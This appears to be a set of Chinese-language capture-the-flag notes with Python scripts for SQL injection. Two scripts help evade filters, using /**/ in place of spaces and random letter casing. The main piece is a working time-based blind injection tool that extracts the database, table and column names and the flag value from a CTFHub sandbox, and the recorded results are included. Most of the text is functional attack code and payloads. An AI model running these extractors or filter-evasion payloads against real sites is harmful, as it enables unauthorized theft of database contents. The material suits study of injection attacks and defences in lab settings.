1.替换空格
利用 Python 字符串的 replace() 方法实现(代码并未使用正则匹配):把空格替换成 MySQL 的行内注释 /**/,它在 SQL 里等价于空白,可用来绕过对空格字符的过滤。
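def replace_spaces(payload):
    """Return *payload* with every space replaced by the inline comment ``/**/``.

    MySQL parses ``/**/`` as whitespace, so the rewritten statement means the
    same thing while evading filters that reject a literal space character.

    Args:
        payload: the SQL fragment to rewrite; an empty string is returned as is.

    Returns:
        The rewritten fragment (``str.replace`` is used, not a regex).
    """
    return payload.replace(' ', '/**/')


if __name__ == "__main__":
    # Kept behind a main guard so importing this file no longer blocks on input().
    a = input("字符串:")
    print(replace_spaces(a))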
2.字符随机大小写
# 模板位置:file,setting。Editor。file and Code Templates
import random
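def random_case(text):
    """Return *text* with each ASCII lowercase letter upper-cased with probability 1/2.

    Spaces, digits, punctuation and letters that are already upper-case are
    copied through unchanged, so ``len(random_case(s)) == len(s)`` and
    ``random_case(s).lower() == s.lower()`` always hold.  Used to defeat
    keyword filters that match ``select``/``union`` case-sensitively.

    Args:
        text: the string to mangle; an empty string returns an empty string.

    Returns:
        The randomly-cased copy.  The choice comes from ``random.random()`` and
        is not reproducible unless the caller seeds ``random``.
    """
    out = []
    for ch in text:
        # The original test was `ascii1<97 | ascii1>123`: `|` binds tighter than
        # `<`, so it compared against the wrong value, and 123 is '{' rather
        # than 'z' (122).  A plain range test on the character is unambiguous.
        if 'a' <= ch <= 'z' and random.random() > 0.5:
            out.append(ch.upper())
        else:
            out.append(ch)
    # join once instead of repeated `result += ...` (quadratic on some interpreters)
    return ''.join(out)


if __name__ == "__main__":
    # Kept behind a main guard so importing this file no longer blocks on input().
    b = input("输入字符串:")
    print(random_case(b))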
3.时间盲注
注意:需要替换 base_url(指向目标上带注入点的 URL 前缀)。
各函数需要按顺序逐个调用,后一步依赖前一步的结果(先跑长度,再跑内容)。时间盲注只靠响应耗时判断真假,网络抖动会造成误判:sleep 的秒数要明显大于目标的正常响应时间,并给请求设置超时,对跑出的结果再复核一次。
# 模板位置:file,setting。Editor。file and Code Templates
import requests
import time
# URL prefix ending at the injection point; every payload below is appended
# to `id=`.  Replace this before running -- it points at a throw-away CTF
# sandbox and will not exist elsewhere.
base_url="http://challenge-5a36cec53d8acb57.sandbox.ctfhub.com:10800/?id="
#数据库名的长度
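def database_length(max_length=44, delay=2, get=None, target=None):
    """Return ``length(database())`` via a time-based blind oracle, or ``None``.

    For each candidate ``i`` in ``1..max_length`` the request asks MySQL to
    ``sleep(delay)`` only when ``length(database()) = i``; a response that
    took longer than ``delay`` seconds is read as "true".

    Args:
        max_length: largest length tried before giving up (the original loop
            stopped at 44).
        delay: seconds the server sleeps on a hit; also the decision threshold,
            so choose it well above the target's normal response time.
        get: callable ``get(url, timeout=...)`` returning an object with an
            ``elapsed`` timedelta; defaults to ``requests.get``.  Injectable so
            the oracle logic can be exercised without a network.
        target: URL prefix the payload is appended to; defaults to the
            module-level ``base_url``.

    Returns:
        The first matching length, or ``None`` if nothing in ``1..max_length``
        triggered the delay.  ``None`` also results from a dead oracle
        (filtered keyword, broken syntax), so confirm with a known-true probe
        such as ``1 and sleep(delay)`` before trusting it.
    """
    get = requests.get if get is None else get
    target = base_url if target is None else target
    for i in range(1, max_length + 1):
        # Two fixes to the original payload: it wrote `length(select database())`,
        # which MySQL rejects (a scalar subquery needs its own parentheses, and
        # database() needs none), and it prefixed `0 and ...` -- with a false
        # left operand the sleep() never runs, as the author's own note above
        # ("0 doesn't work") observed.  `/**/` stands in for spaces (section 1).
        url = target + "1/**/and/**/if(length(database())={},sleep({}),1)".format(i, delay)
        # timeout keeps a dead host from blocking forever; elapsed is measured from
        # sending the request to the first response byte, which is where sleep() shows.
        response = get(url, timeout=delay + 10)
        if response.elapsed.total_seconds() > delay:
            return i
    return None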
#数据库长度是4
#查数据库的名字
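def database_name(length_database, delay=4, get=None, target=None):
    """Recover ``database()`` one character at a time via the time-based oracle.

    For position ``i`` every printable ASCII code ``33..126`` is tried with
    ``ascii(substr(database(), i, 1)) = j``; the first code whose response
    exceeds ``delay`` seconds is taken and the scan moves to the next position.

    Args:
        length_database: number of characters to recover (from
            ``database_length``).
        delay: seconds the server sleeps on a hit; also the decision threshold.
        get: callable ``get(url, timeout=...)`` returning an object with an
            ``elapsed`` timedelta; defaults to ``requests.get``.
        target: URL prefix the payload is appended to; defaults to ``base_url``.

    Returns:
        The recovered name.  A position where no candidate triggered the delay
        is skipped, so a result shorter than ``length_database`` means a missed
        character (network jitter) -- rerun with a larger ``delay``.
    """
    get = requests.get if get is None else get
    target = base_url if target is None else target
    result = ""
    for i in range(1, length_database + 1):
        for j in range(33, 127):  # printable ASCII; the original stopped at '{'
            url = target + "1%20and%20if(ascii(substr(database(),{},1))={},sleep({}),1)".format(i, j, delay)
            response = get(url, timeout=delay + 10)
            if response.elapsed.total_seconds() > delay:
                result += chr(j)
                print("result:", result)
                # The original had no break here and kept scanning the remaining
                # codes for a position it had already resolved.
                break
    return result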
#数据库名为sqli
#跑表名,将表名用group_concat连接后再跑
#表长度
#select group_concat(table_name) from information_schema.tables where table_schema = database()
#length(select group_concat(table_name) from information_schema.tables where table_schema = database())={}
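def table_count(max_count=100, delay=3, get=None, target=None):
    """Return the number of tables in the current schema, or ``None``.

    Counts ``0..max_count`` are tried against
    ``select count(*) from information_schema.tables where table_schema=database()``
    until one makes the server ``sleep(delay)``.

    Args:
        max_count: largest count tried; the original ``while True`` never
            terminated when the oracle was dead.
        delay: seconds the server sleeps on a hit; also the decision threshold.
        get: callable ``get(url, timeout=...)`` returning an object with an
            ``elapsed`` timedelta; defaults to ``requests.get``.
        target: URL prefix the payload is appended to; defaults to ``base_url``.

    Returns:
        The matching count, or ``None`` if no candidate triggered the delay.
        Progress is printed as in the original.
    """
    get = requests.get if get is None else get
    target = base_url if target is None else target
    for i in range(0, max_count + 1):
        url = target + '1 and if((select count(*) from information_schema.tables where table_schema=database())={},sleep({}),1)'.format(i, delay)
        response = get(url, timeout=delay + 10)
        if response.elapsed.total_seconds() > delay:
            print("result:", i)
            return i
        print(i)
    return None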
#两张表
#跑 表名长度
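def table_length(max_length=200, delay=3, get=None, target=None):
    """Return the length of the ``group_concat`` of all table names, or ``None``.

    The names are joined with ``group_concat`` (comma separated) so one length
    and one character scan cover every table; ``table_name`` walks the same
    string afterwards.

    Args:
        max_length: largest length tried; bounds the original unbounded loop.
        delay: seconds the server sleeps on a hit; also the decision threshold.
        get: callable ``get(url, timeout=...)`` returning an object with an
            ``elapsed`` timedelta; defaults to ``requests.get``.
        target: URL prefix the payload is appended to; defaults to ``base_url``.

    Returns:
        The matching length, or ``None`` if no candidate triggered the delay.
    """
    get = requests.get if get is None else get
    target = base_url if target is None else target
    for i in range(0, max_length + 1):
        url = target + "1 and if(length((select group_concat(table_name) from information_schema.tables where table_schema = database()))={},sleep({}),1)".format(i, delay)
        response = get(url, timeout=delay + 10)
        if response.elapsed.total_seconds() > delay:
            print("result:", i)
            return i
        print(i)
    return None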
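def table_name(length=9, delay=3, get=None, target=None):
    """Recover the comma-joined list of table names character by character.

    Args:
        length: number of characters to recover (from ``table_length``); the
            original hard-coded 9, which matched the recorded ``flag,news``.
        delay: seconds the server sleeps on a hit; also the decision threshold.
        get: callable ``get(url, timeout=...)`` returning an object with an
            ``elapsed`` timedelta; defaults to ``requests.get``.
        target: URL prefix the payload is appended to; defaults to ``base_url``.

    Returns:
        The recovered string, e.g. ``"flag,news"``.  A missed position (jitter)
        is silently skipped, so check the length of the result.
    """
    get = requests.get if get is None else get
    target = base_url if target is None else target
    result = ""
    for i in range(1, length + 1):
        for j in range(33, 127):  # printable ASCII
            url = target + '1 and if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{},1))={},sleep({}),1)'.format(i, j, delay)
            response = get(url, timeout=delay + 10)
            if response.elapsed.total_seconds() > delay:
                result += chr(j)
                print(result)
                break
    return result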
#字段和表名一样,先跑长度后跑具体字符
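def column_length(table='flag', max_length=200, delay=5, get=None, target=None):
    """Return the length of the ``group_concat`` of *table*'s column names, or ``None``.

    Args:
        table: table whose columns are listed.  It is spliced into the payload
            unescaped (it is attacker input, not user input), so a name with a
            single quote would break the query.
        max_length: largest length tried; bounds the original unbounded loop.
        delay: seconds the server sleeps on a hit; also the decision threshold.
        get: callable ``get(url, timeout=...)`` returning an object with an
            ``elapsed`` timedelta; defaults to ``requests.get``.
        target: URL prefix the payload is appended to; defaults to ``base_url``.

    Returns:
        The matching length, or ``None`` if no candidate triggered the delay.
    """
    get = requests.get if get is None else get
    target = base_url if target is None else target
    for i in range(0, max_length + 1):
        # The original used concat(column_name): for a table with more than one
        # column that subquery returns several rows and MySQL rejects it as a
        # scalar; group_concat collapses them, matching table_length/table_name.
        url = target + "1 and if(length((select group_concat(column_name) from information_schema.columns where table_name='{}' and table_schema=database()))={},sleep({}),3)".format(table, i, delay)
        response = get(url, timeout=delay + 10)
        if response.elapsed.total_seconds() > delay:
            print("result:", i)
            return i
        print(i)
    return None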
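def column_name(length=4, table='flag', delay=3, get=None, target=None):
    """Recover the comma-joined column names of *table* character by character.

    Args:
        length: number of characters to recover (from ``column_length``); the
            original hard-coded 4, which matched the recorded ``flag``.
        table: table whose columns are listed; spliced into the payload
            unescaped.
        delay: seconds the server sleeps on a hit; also the decision threshold.
        get: callable ``get(url, timeout=...)`` returning an object with an
            ``elapsed`` timedelta; defaults to ``requests.get``.
        target: URL prefix the payload is appended to; defaults to ``base_url``.

    Returns:
        The recovered string.  A missed position (jitter) is silently skipped.
    """
    get = requests.get if get is None else get
    target = base_url if target is None else target
    result = ""
    for i in range(1, length + 1):
        for j in range(33, 127):  # printable ASCII
            # group_concat (not a bare `select column_name`) so a multi-column
            # table does not turn the scalar subquery into an error; this also
            # keeps the string identical to what column_length measured.
            url = target + "1 and if((ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='{}' and table_schema=database()),{},1))={}),sleep({}),1)".format(table, i, j, delay)
            response = get(url, timeout=delay + 10)
            if response.elapsed.total_seconds() > delay:
                result += chr(j)
                print(result)
                # the original kept scanning the remaining codes after a hit
                break
    return result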
#查数据:长度,具体字母
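def flag_length(column='flag', table='flag', max_length=200, delay=3, get=None, target=None):
    """Return the length of ``select <column> from <table>``, or ``None``.

    Args:
        column: column to read; spliced into the payload unescaped.
        table: table to read from.  The subquery is used as a scalar, so the
            table must hold exactly one row (the recorded run had one); add
            ``limit 1`` to the payload otherwise.
        max_length: largest length tried; bounds the original unbounded loop.
        delay: seconds the server sleeps on a hit; also the decision threshold.
        get: callable ``get(url, timeout=...)`` returning an object with an
            ``elapsed`` timedelta; defaults to ``requests.get``.
        target: URL prefix the payload is appended to; defaults to ``base_url``.

    Returns:
        The matching length, or ``None`` if no candidate triggered the delay.
    """
    get = requests.get if get is None else get
    target = base_url if target is None else target
    for i in range(0, max_length + 1):
        url = target + "1 and if((length((select {} from {})))={},sleep({}),1)".format(column, table, i, delay)
        response = get(url, timeout=delay + 10)
        if response.elapsed.total_seconds() > delay:
            print(i)
            return i
    return None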
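def flag_name(length=32, column='flag', table='flag', delay=3, get=None, target=None):
    """Recover the value of ``select <column> from <table>`` character by character.

    Args:
        length: number of characters to recover (from ``flag_length``); the
            original hard-coded 32.
        column: column to read; spliced into the payload unescaped.
        table: table to read from (must hold one row; see ``flag_length``).
        delay: seconds the server sleeps on a hit; also the decision threshold.
            The original used ``sleep(1)`` with a 1 s threshold, which a single
            slow round trip can trip; 3 s matches the other oracles here.
        get: callable ``get(url, timeout=...)`` returning an object with an
            ``elapsed`` timedelta; defaults to ``requests.get``.
        target: URL prefix the payload is appended to; defaults to ``base_url``.

    Returns:
        The recovered string.  A missed position (jitter) is silently skipped,
        so a result shorter than ``length`` should be rerun.
    """
    get = requests.get if get is None else get
    target = base_url if target is None else target
    result = ""
    for i in range(1, length + 1):
        for j in range(33, 127):  # printable ASCII
            url = target + "1 and if(((ascii(substr(((select {} from {})),{},1)))={}),sleep({}),1)".format(column, table, i, j, delay)
            response = get(url, timeout=delay + 10)
            if response.elapsed.total_seconds() > delay:
                result += chr(j)
                print(result)
                break
    return result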
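if __name__ == "__main__":
    # Run the steps one at a time (see the note at the top of this section).
    # The original called database_length() at import time and discarded its
    # return value; guard it and show the result instead.
    print("database length:", database_length())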
"""
a = database_length() 4
database_name(4) sqli
table_count() 2
table_length() 9
table_name() flag,news
column_length() 4
column_name() flag
flag_length() 32
flag_name() ctfhub{83ca0ed583c1d37f2ae0dbba}
"""
4.url输入注入命令
提前写好 payload 后,在下方网站中做一次 URL 编码。
注意:# 需手动改为 %23 —— 未编码的 # 是 URL 的片段分隔符,客户端会把它及其后面的内容截掉而不发给服务器,因此用作 MySQL 行注释时必须写成 %23。